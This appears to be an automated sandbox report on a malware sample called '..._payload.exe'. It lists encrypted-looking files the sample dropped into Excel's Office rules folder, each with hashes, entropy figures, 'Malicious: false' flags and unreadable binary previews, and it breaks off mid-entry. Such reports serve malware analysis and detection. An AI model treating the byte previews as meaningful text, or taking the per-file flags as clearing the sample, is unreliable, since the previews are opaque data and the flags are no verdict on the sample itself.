                                                                                                                                                                      Preview:<?xmlC.CQ.gj|..!..{...<..>{U.@G..4.O .o.}.D.,...&.:.0...b..._...._f..#.A..].. .Oq|..L./.j......6@....{]....(R..J..v$.N...u..a...A...!Z!^.4...eM.}.._.\.e..4l=.Ww..oL.......F....{.P..vsP..]iY.[.v%....d.9.Hhx...\..m..:.65.8...:.9....iRY?%...m.^.ibj.W...u.g.n..3....hFx.....b..I.jJ.k%V.L^f.yE..,Z}.]y..nK........+(0E..T...I.).........U.. .&.^.3NY.(...?.y.K.WM......`.;A..*.:..L\....o.P....N....D..F..V..\Q......C.A.x.....-.......%}.4.hK...B..xUE..-C.z..).O...>.q../1...Q.s.fr...._..$d+..)}..C.Wn.|.s..&..x.&.=.._....\.....%v!C.......H...FV...I(.ka....~I.N...........,./I5.o.......<c..G&.........,.....x.../.hS.@+.Y.*TC..A...\.p.....*.Vj...fUe ..u...F.:D.vI..C...NV....!........'.5.C.Xu)..s...\......lCV/..-.$H^.,......u...@...agB^..Ac..."..@.F.V..M.3.*...p;*?...r.....e6a.......7*Wys#.?..i..?X..k..B..1EJH.....[..i....{n0U....f;.....^.,.....bTd........A.."............o.;..[t.]..s.Q..n.j1=.......lg.=..i.u.l...FJ.CX..D.i........_..U{....'mMsRxMUuXypapZbGOAfxD9pczHmW8zV

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68001v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1003
                                                                                                                                                                      Entropy (8bit):7.754795085446181
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cH7HhPufHOuTONuEo53K5o7PSmIzBQAApP2bD:o7BoucEo53iEamIzBQDsD
                                                                                                                                                                      MD5:5B20E836729FA57BD280179786D1A358
                                                                                                                                                                      SHA1:55F7AF65459A16A3A1F3BB3DE60B58457834EFE7
                                                                                                                                                                      SHA-256:AA43E7C924D48A2BC62476021AF385C71CD0077805C6C2EEAFE865DE7D05335E
                                                                                                                                                                      SHA-512:C5AD2F0A7979E3EF8B39FACCD8452D26E01F20C8666EBFBBDABA2BECA8278BA70E18F55E16AF88A5B5AF2CD66775D19BA8AA735F2815E8D4F59B3CE7F7EE70AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.g..2k...pQ.......`E.@T."}*...Ab.y.M.d{......1..^..{T'!..B..]....9.......I.h.-/..eZ..l.q.V0."'..&R.;.3].V....u.n.n..W..XX........6....................S.b...Z.%gQ....%.{E.F....b0..f..8q-.U.dNzq...s.RE.6..c..j...3.<.2.x..H.F[...~.47}.b.E..Q....{.e..107.b....k?..g2vj...17...._.....R...4s0....Q....M.`j!.T..O0..J'.P....f"09MA..~.9l...0...Y..d...........`.mO9..jB.'L/u.m...j,D......7'.V........Z.g~.....ve..;.f..{...Va...."a..q}.ja.>...G.`..D..g.(...n..?.....$.U........55...%....To...U..M...l....`..".}.v!I1...s..6..k..VL7d...T.K6...1.+X...G.p\e.4......;.p.p.E.V.flfq..y.....Z.....f]..+.1r~.E!...R@ZP" ...ur......b...T.5-...W../......^..:..l@.qK.....8?..akZ[Q.}..$..-.9.kw..5...9....L..[..b.c.+.j)>0`2u..=..F..~...j.Ic.h.....?.W..^_,S.}......].I.9}W.W..H.9.:.|..X7..ESk.`.....l.{p.?....`w~k........t..R.F.(n..4......d[./...[@q....R......6.LOk....+...U.}z..^.5 t.6X.+c+...G..l.$68Q.lmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68002v11.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2980
                                                                                                                                                                      Entropy (8bit):7.932286078885427
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZDt4wtPyVqwibJDNoJlC9nKIOtzn2neRlafoQ6GuZwG1wd844VCb7/h+vN9m4D:ZDxByU7DNvlyN2eraj6rwGv44Yb7/hAL
                                                                                                                                                                      MD5:401F61B6314AE21CA1755E61BC92D3DF
                                                                                                                                                                      SHA1:3933E460738DA66DDCD934FA8D031F5917E075FC
                                                                                                                                                                      SHA-256:7E26D7301F0CC8ED9CBA0543CDD3AE465AF60C15632A5028C9090134D90FD1B5
                                                                                                                                                                      SHA-512:0E706F02F0CD2942ADC970399CBF659E2595D8DD6E2231A3633D6511FE1C2FBB51C4D161E3E594EE136D684792331A8FCFAED11493EEF962FC027246488BA463
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..b#.JXm`..xo..a........-...... .1..+..]6....v.R...=.[e..k..NbxCyC.......G.'.yjhG..>.......v....8v...x.H[E`.d...{S..QZ..\....j.........._.F~...q..u./TP|...\..7_|!..M.Q......?r6..k.(.pop.c....b.V..........&$..z....r.E...0.<......Jvo..:r....c{n....4.x.~^.L...E..j...4.Q...i.3.."..v....[...K*=...Pz....?B.PN..'..xj..l......r/&.........Y.6.9.....Y2.@~...k.......Ay.....V..!..}.....y...h.>]..&3<..8.z.gp.FA..<p.h....h.q..X.K.....V...H.S....Z..~.......Ml..o)l.6Q.)B.YF3.z..4..,-.F.b..X<o....c...E...0...iI@..............( dF..vq4...SZ...l....,...6.g\~.pWydV..FC.B6......x.....B........ ..5....2....qQ.$......]]\........R..Zn..BYVM......J...s.[..r0......u.Q..L...Z..H.`7+.AE.SD].=......fc...9M...ki...s..W[..I[{..K.X<5"a.J......G..>......0#{.L?.0`.5.\...qq`.r...O.;..R..~....*)&....dF....r.Q-C.U.[.'S...T.......#..bm./.ow.BU....U>.f...N.Pi..[!...o#.`..emJ;..,s.......S.W..Y..7!.._.:p.[....#!\.$q...z....,.H......=..|)....aP%|..&.*..UM.....I.A\../...).l4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68003v12.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2672
                                                                                                                                                                      Entropy (8bit):7.927925433978602
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zkIiRdYR1lKkADFbTpQarL+XAqe81opFWnWRfPgArhmBaokSv5dVeUD:6RdklmvQ+L+Xa86FwWRXjrABFkSZ
                                                                                                                                                                      MD5:36C10AC5CCB865E84099E69C52C10AC8
                                                                                                                                                                      SHA1:0F0F9B4EE2E89B61B3B77531B83FA0477AD73E17
                                                                                                                                                                      SHA-256:7549EFFC5057C0C65F7486B15F52C0EA148BF5D0652A42A5F14B017E9890B674
                                                                                                                                                                      SHA-512:2DF31C493FA9A15EC50EBC9D40ACCDD678875F7C550FC2D61EADE287D40652C141C2E2964299B4D0120542CF9C05C545B6841A01C224ABC511EC5DB89A75301C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlt.X.@..db......'"...-:A..9....+.J.fz.ST....!..E..o....'...E...8d9..~..^.8.K...3.T..9g..!qD.....rv..*H. .$w.}71..}...T...8*..^.J..<.v9.|...K$9.a.B..[....c..i..U.....Y.H...0./.....O.........A.......|>...8|5..s.....?.;........F.....S..h....:.{.i#'.5}f.(8..?..3-}.*.....:....o.$J..X..N.QI.a|....]..........g.l.E...8..g...\...ABQ..r.9..z..2..O0S.7.H44...O..EH..).N.(..........R...=.2...e..........h.q...b4...$...s.....e/..R.1,.{C}......q.z."...d..]!N.../.3....*......./sr.O@..^......e.......d$.'.8#8ud*..r....TDM?.bC...xy 8JB...G..`.lmQ$TG:..$..~d..Z.......{.U..WX...\m4..........L.u..$...M...(Fo....#..\P.1'ja<...B.......9.}f=.....C;_._.^.l......{..f.#..E.b.}...En8./..?...z.i...X.\t%K....@.-.N1.f.hJ.....J....G..hT.4]..0.T..a>..p..[F..e..R.0.....F.m./N...A.[.=+O.@......@...==8DJ..R>.T}....r>..^..........T...8.g>#n*..._[....~...C......*;,.)%.f..L.._.%..W...j....S.H.A....PA&b."u..Us........:W.1...@..h...g.l........?...:.e...o.VF..cJ......C+.K.yA.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68004v16.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2762
                                                                                                                                                                      Entropy (8bit):7.936639357221874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:phxli4KRsq2rYgQB5zVj+RF5oOkOpl69ZB1sJB09MwALAUGS6B/8YMgmlwwID:p1KRs9rjQBBVj+ZoOXOZB1sEALAUGSOL
                                                                                                                                                                      MD5:0A38924059BEBBE39D999BE3F25E6F42
                                                                                                                                                                      SHA1:3D2B573C0AF95C95CDC5B02289DA459EE8F697EC
                                                                                                                                                                      SHA-256:F7CA96685F4EB6024C54BE649446032FD517F7326A1AEF254C65E0E4672B4960
                                                                                                                                                                      SHA-512:0B2A9DFEBC99E5CD7E5D2ACF2E2B02538EDBB14F45B2B0AAC8ACC77DA3A05C8FFDB65BEA083327A6791EE4D43E32D6F83461DDE1A6F6580683B7D5CF431841EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..N....../0.0.G.3......u-.....!.~.vC:.Bc.v....X\..y..r........}........2....9..!.*....+{q...m.R./...f..Q..7nPi...D.`.8~L..I..|.U.XC8.W,...:.J.G\..p].,...q..l......g. E....;....)....QV..y..c.p.H..}y.l'.~.C....'..f..}..:~....}^A.Z...iS..T7G..be..A6...I....@..e?...`R.`aZC...~:..'..#.y..\.&.7._2.....N....l.i[J........".W.:).,&]./O..>Tv.k..<.(......q...<..>......!..O3....l.......l...*.n.E.c&...<..:...v.=.j....[?....;....y....H/#..rh......r.u...*.u4.^.@.....K...... .%...e.>....!....p=.Do.wN1.2.....T2.hW(...@9..A)t.mS.N==3.3d.z...U.]......5.s.#.=.f..r.....:;N<.(.S.Ml....p....c...nR.zB..V.BJ.7..K../.I.L......'..U...M.....:AS*.^..$..C.O.!/.\.^."f.Z.9.%..O.h.K........*w..u.6.Ll..?.lX....c.+..F@N.qM...6.@%+.$...P.>1.K...&1.H...x....4.r..<6....l..N.9..)`.jm.m......+v..@.R.ypL...g...~..v.3...M.W. ,.\n..o.U.....@)..go.U8A%....#.H....%X....1..e..g.2fL%...~.O"..d..v..+....c.:.Y.k.....6...(.T0...nb.[.<dC........M. ...s./..'....}.1f.o..4.s.wzp..*U.T

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68006v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                      Entropy (8bit):7.7732994207097015
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:+cHp+0D7JvAWTmkWmqaHCeEDygWkHa2bD:+crDVvAn1/aieETWkxD
                                                                                                                                                                      MD5:62D1D9510B8939542FADD07203FD9426
                                                                                                                                                                      SHA1:519424A312DF40773939133E2B1AB6EF9D450B72
                                                                                                                                                                      SHA-256:B8696911FAE36BE795A09C8F643EB484DFE71A6B88EFAA447B75BE69F3F2CB99
                                                                                                                                                                      SHA-512:09C2C299133D274DBBDA5790545B17D59FE9E57BBA479BBB859191BDB80637C98E1C7AA4D972762E6ACCD58038D38D57E8C825A5EB62E08EBA0DAF7B9893D546
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.C.Sa.=............S.|...E.r.%.6.8.c.."...v.v `.@.d...M..k...+J-....A3S8.N..a.......1,.d[..m.sv..K.....*.....|fq.?@.>9.......B....@".i.V3.r...~.mFv...P..0....&.P.Y...b.....n..`g..)uw..n..(...k.....p.B*..Si...y..%.l...nt~.E.....e....$..a..[R......O.{..%....s2......e{+D.sD....!.....aJ......[1$.;......\..q.Zg.............O5.Nq. .^..-....=.zV..%.].:5....TV%9F.ZEh......s..0.2*.}.z....Js...w.u......@].....J.(..33.J..W....Z+...@|I......mp...9.o2...C./+.b..I.s.QS.&P.8J./......MMXS....s...... G..f;Z..e...~....Rqmo%.w..a.5HLG'(...6..ozM.W..A..o.EPH...D.;S,....79..(.B.._}"......<{.1.,.........'$..cNo].:..4.p(EJ..q.t...H...".!.4z8.\K...D....SeF@...0%."U....{S.).X@.?.,.....V.9E.8.Y'.b:.....^6p.UW...Q\.....S.B.......L.6.dmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68008v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1010
                                                                                                                                                                      Entropy (8bit):7.827726444545341
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:gkfSz4iULZUP6k4zzizkz5oBkIzVcZKw6LE4w6fgFHXE5o2bD:2899Bv8k9zIhD3LTw6YeD
                                                                                                                                                                      MD5:C5611D241F747631EBC6A1F4B9527A66
                                                                                                                                                                      SHA1:95553F7AA6A80FCAE916BAC460C77299439CB492
                                                                                                                                                                      SHA-256:45A5620830A59B386AAD329DD6F66742EBBF774DD5EE03FDA1EDADBC18ADB861
                                                                                                                                                                      SHA-512:4B904A5738AE2AD96CFCE944F94E0976C968E9DD0967BF9256F49805DF49ED7B4AE33899B1D710F8AE7E048162C3AE90849D1532081F338C15902CBC5E8E60A2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...:...D.O...6`0Lo....X..K.,.-u..w..[;..BR..F..C......&...]Ms. .o..O$+...AA.mV1..@.%.~-.....C.K...V...>.........B.....6.n.......U.P.+.$..(.&......&.!4...Sc.j/...g.R..*^..w,.&.'8\..TY....A.o..Y.?...'T..'..#..........ed.../.TnaZ.=.....P..].\..n..M....(......q..1'b..X)...uQ.f.(...!.7...kPCR$.$.TFf..;9.|..t..e-7..\{.LY..bK..kz..S.....Q.....g..t.L..#c.!s..h..j...myu..........*...*..,f....Y.}.5g..T.y.YJ......-....Xu.?.I........d_.]...#[..ob..@..`...gt}......\..{.QJUv.,....N|....V]...^7E.W.5j.....!.9...h?..p.B..m.*...Yj.p..gC/.J.s..!...`..nh....\@'O.1..V.:..m.?5..7..J..H.4VhK.x.......Sv,.....b.V.+...0...D.q...R..#)..^.....@..;V..Ps.....%.43...Q.y..F......>UT..$+M=...w8._....!.....8...z-....J........`.C...[7....U..=.V.A,.V.{.i..H.j.Z=..,.....U>G..!..>a\.j... .t......~...)C.X6.j.A....[Q2.K:]..]...V]...k...Yc....B.Z.G....2.Tj...@.w.phc...'3xA.....G}.|.N5|...WU/.."..Ia..E...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68009v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1380
                                                                                                                                                                      Entropy (8bit):7.838414592777931
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RAUF4XpjxjTFcZMPuPyc23Fs8sk3cZgkBaxuNeAgJ3D7wGelPLXyBLMReV2bD:v4XzH6MPuU1s8FsSANpg1vwdlPL4LefD
                                                                                                                                                                      MD5:70F3695EB9BD30A70A3C671285A95D4A
                                                                                                                                                                      SHA1:4B622D5019B360D0CAD93545ECD5E88E1080FB10
                                                                                                                                                                      SHA-256:9F20466C1FA69D0C9436E7B8128A982C0D6D2C1F73CD06C7B1F5EDD52B2CE01B
                                                                                                                                                                      SHA-512:D0FE1477AE8A6D62DCCB8CEE6E886C659946876F4F35C889252C3972B032203822039DF9140A7C47F7E2853B9DEF71F7CAC986A40A42CE595B20226AA068B60D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...v....}w....M._..v......_.['..vdE..#..zl....F.M.......{..el[....>@...A....K...l...... <..v...?.K..2E..b&nt..H.j...cb.>.L.znD..ZL....p&.AH.'\2L.q..."...B..n...`q....O.X4.Y...4..g...'c1u..-o...8.i...S..<.wZ..P...W..B......z..^..S9.4k2/.].#.......".0rz.~!.%#..s...m....U.u...Z~I3)...............VgR.e...5*..hE..l...@z.a.K........m.RP.).u.......a.... B.s.g.<.$...L....&.D.=^\.I.T.yy...H...u.(r)&.m.{....V..9Sp....n...R....m.L.d.#.`.q\...gw..95..y&..M... ..v.#.,U...[..".lc...s8Q.qF$.*....Yw."..F.~..T[.I.'>...Z.|.v.9.~..[.DX..{O4.:......f.^5....n.ai. |./.../+1.m..p^-Ef.P.C...6m.K.D..!9."2.....46..H=.".L2 #!..w..h..6&KMEt..3....>j.!....(@..........P....dh.6;..9.....R5.._.).......X."....X__UP-;..@!?+...b.7..5m.V#-[...........:....;.CB.....^.....:...FG..#p..z.n.I]C.;+...b.}K3..J.s4U.t...%.8}b...t).2.+..1.*g.z..F...n.g..d.W....c.Kx.}..4.e..D.I.....j?.....W#.R.Y}..kqvx..pN)..hj.....J.b..%..BG......NZ..w...>{.-%#.3.>F.?m...a.`..Gq..c...ZY

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68010v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1614
                                                                                                                                                                      Entropy (8bit):7.874794614241302
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:rRCHkCulG3OSqnboBm7ahPwh47ORgob7MD:9AkCUG3hqnGmjh47eXHo
                                                                                                                                                                      MD5:0283B0C95B9F1E429AEA0CC95A8B636C
                                                                                                                                                                      SHA1:7F2980F75754F4947C6C9E0F2624DEAAE9289273
                                                                                                                                                                      SHA-256:905DFAA04C315D1890CD6FE49DA880AC4CE0CFFF87D4E837829B503525BA1B42
                                                                                                                                                                      SHA-512:D63D6DE475A7EF5E04B9FA94AB1BE2CA74FDE6F6E061F471D8D24B2A884F0599FE99DE92199EF3B6E86056DB09700ECE21184F914C010C26944D89055E2E92C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..:1.....%.Q..{A..EPD9..=.A.1..5.....@.t.LxWa.;...8.q'.p./..0".y.7a...,QG.o3.Od}\...R.....PI.+..I....&.!...2@...}G{...y].'f..|....J...{....e.s).G..O^}...K_.lU....P^/.3..^#U.Q..d.`..Z.U..(.D..5.,g..'..P...V.U.J.nVXt.!...Q..F.....fk5..zJ.mN..E..2(..L}...~})......'.q..._$..\.6...v..-qN.m..aZ.+).....%.;...+.....f.3.=Z....:D..+.l..j..Iy.c.+>8.......K......@..C._.8..$.?..bQU.a.n`.e...f...?:J.N*g.K....iX..........m!.^..f.H.Rbh+'..}Ka.o.s.#.y..._...F\T.7#^.v....Q.d%U..b.7X.Lf..%...n.;.`.K5...dwz5......O8.Q(.1.tA'f.NP.q^..q`..(......e.al.5.M.DO.A.;$...$...C..q.P....q..D.*..0..S.!..6.h.+...w.........6.##..n|.&1KY.."'.....r...!......&.E .x4.HA.4....o..y....fw..Tl......b....2[.t;uRehsk......w..md.a......S?......V&....tx.Bb.:7.w.#N{,\....U.09.K.+.|m.j.=...!I./4.p.$...."[.8u...Q.>..T.....T..RWG._.p..CR^..jU.*?v0=.L,.$i..A..Ib...(..."...GN@..T..ie............m @...1.SQQ8.w.e|2..n@a.c.5q{):.9.S...8>..KLQ.Wls.*....=.w. ]......9.F...n..Ry....K. ...F....@..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68011v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2753
                                                                                                                                                                      Entropy (8bit):7.9240771120677955
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:U/x9rNR4fzZzcMsL2c5d02nfIpfwRiljSGvELRLlVGh8QAuj6IUEQYSD:U/x9rNR2sL2c5ApfmopEtLlVGh8QAiQ/
                                                                                                                                                                      MD5:303D27D65499608643687B992AC6FFA9
                                                                                                                                                                      SHA1:44E4B9C1CAF5C0D2E9ED4E7637A4D6ADF9640A15
                                                                                                                                                                      SHA-256:BDED2B6DB18269EA74443F1647B476AA5FDF35C82D778C08BF21D6315CDA51D2
                                                                                                                                                                      SHA-512:69A1D87CB2A704DEFB9675CB41CE39B9DE79F3B0383366BF42458325654361DCA5F52AE82D33850A7F292354C24B5312BFB8621CD7F73B39C2816BC15E05F14F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Wk....r....g...ug.d......R.(..C..gu.gn........%...X(.....P.7.s...g.Gl...?.i....]..\.j..d....&..W..6s...S.f...l.....^.l.<.F...O..}p.....L...p.....ke.....Q$...........F,....Jg.2.......h.&8.w.(.3.x.R............$._..X......%..@Z|.XR....z....2.......8/..S..b....n.@s.....?\..~..Z.V....ZP...A..o..u..1T`~...y.X..%...6|7.P1~..:..._....^..5W..}...!.jj..6.)...Q.-N..........E..]..SN.....#.....(.(5h.........~dM..=I.....k...:.&~..;...!3....$......,..@...n.P.B(.Q. ......#.D_9.U...J...s....i....Pl.R..P..x..7.......n....tS.....-.>4T......h...fxa2[..~ OA...1....b..Y0.....xE:W.y..E..j..|....w.9.kr..}$..i.|..{.)S.I..........*.V\!\........./F.u..d.J......f.F....K..+G..2.*........:.{....../Po.{..".g+02+}..5..]..;d.Sq.^9....d.=...h.@I..z...r.L_.&.L..,I.4.....U..G}....c.....z.M.^.W^.#.r\..`...g.3.C0.|.7.gz..:.%..7..(.....Z..!|..fm4.....[.W8.=.W.c.Cp......j.G.%A..*..t...i.4...."..ik...+7...@.m............Z.....(....$..@.\9..k.........6..Rf..i.1.j.&U

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68012v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1558
                                                                                                                                                                      Entropy (8bit):7.866974760117591
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0z3UJsj2p5zVKrWXIayWw/H1vYbf6PP5vLY6vcwVFhpB0446cru9Bk2bD:6SbvVKbBl/VvY7GP5DXUy9BF4lS3D
                                                                                                                                                                      MD5:754A5B8B72F383D1A5C7D8220C8200E2
                                                                                                                                                                      SHA1:1F31AA846586A1AFAA76F96E5ACC92B33D14C1E4
                                                                                                                                                                      SHA-256:3BF52CAA39DCA1BC0F45DEDF3F511B3FC14E9E7C04043705DAD5E1627F6BD83B
                                                                                                                                                                      SHA-512:218771F266329DAC48BDD50EA69FD86E616BCFDBC9D164E11D6E73E601E8F8F995B52BC7986B5AB72FA31654BADF3E4688053984474753EB6C59C445BCFC3E28
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...?..'7.A.j........C{7.4{.$..p.T..H0.Uf.....lKzC.....[....3.w...RX...,..z.m.k.....3.....$.7.m_.&...}..8.........iz.r.8....L.#.$.4_....5...#.....LAA.M2.p...0`by.J.....U.l..@.m....r ..2.....o..6\.f.H{\V...T.-..U........@.qp.....O.+.:....o.?...k..K...........T...-....;0......p}..u..(..`.eW..z.FS... .(.?.,.8.. .D....A...%..T...........vlky..\Syh...s..(6^.*"..F.....|..8v.....e..{P...}...9G..BaI*....X......`........pxf>.....n."P..P.(9Tm]Z.....v....O....h.........}\a.y.;.r..O...-.....@..@.M.uw.+..Z..)3.:.r.G.....n`......Z../a.Ec.1..[~...H..Z..Q.&....|o}..eb...g..7.B... ....r...{b.].@...)-j"..(|....`>...c?..{.Cn.{.!...>..........a....?..Y....?.F.".tb.r.^....a......bF|...w%.........k.$m.$-X..e..,.!.....9..Q.O.!Mu.z.7.5.....q.....&.9.a....iwB9...Y...^....v.@K..... ....?.S.?... Z.x..3.CTD0.....u..z....4}.($|..D.-g.m{.9.......A4)4...-]...8...;}V.4.r.CE...>..Pk.....o..G.>....us....*.a......vx^..W...I.B..R...uG @..M...0y......>.\....>L..3..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68013v9.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2251
                                                                                                                                                                      Entropy (8bit):7.92343832971588
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:HNGjxEtNnTTrDkrzp7FgjevtYjIPZAgB9pqp9l0FJuKHW+PWNPD:HNhtNn3PiAqvtDk0DunnNb
                                                                                                                                                                      MD5:D417B9B6368245BCD581FB3904B469D3
                                                                                                                                                                      SHA1:A0EE89F536EA44B46B5B561AB226E8F849356CEE
                                                                                                                                                                      SHA-256:CFDFC4B0E781C5CD720EC7F2DDE311888B17A2A687B00B0B3DD0F6D8483E7B60
                                                                                                                                                                      SHA-512:E4C68DDDDED0DE4983B3B1F016BD56BAC149FAA73853AFE991DD10AFBEEF3F6AFE02166821C6C18BA2C889B9646825144F11F20F4A67DE76FA9B7CE0D2D11A97
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml!.SkY...S.0.....^.l.M.......v...B...c.0]..C.sd.n..p.>.$w.."<YT.7..P?.HXR.:....A.}...*.;...R.Us....B,.F..z..,.;A.Dy.../>oyJB...N..kL.....@.........+5...F...2..M0c.`.B.zS.#.....)........N....#.';.*/{ ..7.lQ..Gf...4=..w{....z%..KI.d.Ih.9...<.J....N.K.^..Br....ZN.^...:...C....!.pON...m.u.w../....0|...>*...}....9=....5.....$K8..|....e.>e..r'?o.......f.F..HK~...%<'...q7...T..b....3.L$.g...F.!Dl.\.E0D..j...o.o.R.|.c.......=K.:t.Z...@..4.....L-..[..P.$A.\..3G......=WJ.i....i._......h......_..z^.e."[./...n*.(.0.3/.7>Y5....pf.9..S..&..u.P..q..Vf.}..#s.W..P...].e......'E....o..O.....S...V%./...x...|...N.....w..eF1...(&....N.4:.<{.....$......V......./...j...e?.....P.u.....%..sQ...o(...7p-..T......4.q%..<......F..w..Cx1 ..q..x7Q.......Z. ......>.k..8..7.#Dn.....g.T.M.}...j....jc.7..<..~.}....GDA./...G.....v...[.].......P..'.>.+..O%.i......c....d$-jF.L........bLH.f..H...,.o...!....2D.........2.tv.Z.....>b...r...P.U..d.........kY...>../...%[...\....M..Qd.$

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68014v8.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1826
                                                                                                                                                                      Entropy (8bit):7.897339689168489
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YdxNXIWfm7v8yR6zUlPUT0hNmCInK7lkoOcl/RdpD:8x6WfKv1R6GPokKK7ZOc1RX
                                                                                                                                                                      MD5:A970ECE7333D10EB68DB1F75C0FFEA72
                                                                                                                                                                      SHA1:C31244E2FB21D84C4F64855DBF20F1533C08E856
                                                                                                                                                                      SHA-256:FF9CF0E7FCC86AD305E4F6FA9A2C2B8EBDEF47E197F7BF4D93DD61B94332BBAD
